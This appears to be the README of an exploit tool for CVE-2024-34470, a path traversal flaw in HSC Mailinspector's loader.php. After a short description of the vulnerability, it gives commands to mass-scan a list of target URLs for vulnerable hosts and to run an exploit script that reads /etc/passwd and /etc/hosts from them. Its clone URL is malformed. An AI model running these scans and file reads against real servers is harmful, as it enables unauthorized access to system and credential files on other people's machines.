A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22. The product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.
Clone the repository:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470Install the dependencies
Make sure you have Python and pip installed. Then, run:
pip install -r requirements.txt- This will install all the necessary dependencies to run the script.
To perform a search for multiple targets using a text file, use the script Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/nullThe format in which the urls.txt file should be is as follows:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
Once the vulnerable targets have been identified, we use the script called CVE-2024-34470.py to exploit and display the content specified through the terminal.
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)